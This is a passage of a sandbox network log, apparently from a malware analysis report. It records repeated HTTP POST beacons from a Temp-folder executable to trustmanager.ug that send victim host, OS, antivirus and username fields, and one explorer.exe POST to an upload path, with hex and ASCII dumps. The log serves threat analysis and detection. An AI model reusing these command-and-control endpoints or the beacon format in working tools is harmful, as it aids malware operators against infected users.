73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:05.766572952 CEST	16657	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.2.3	49813	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:05.949814081 CEST	16661	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:05.975801945 CEST	16663	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:05.975820065 CEST	16663	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	192.168.2.3	49814	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:06.122497082 CEST	16665	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:06.148478031 CEST	16666	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:06.148509026 CEST	16667	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	192.168.2.3	49815	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:06.292057991 CEST	16667	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:06.318063021 CEST	16670	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:06.318094015 CEST	16670	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49728	218.233.73.202	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:11.113811970 CEST	2852	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: atvcampingtrips.com
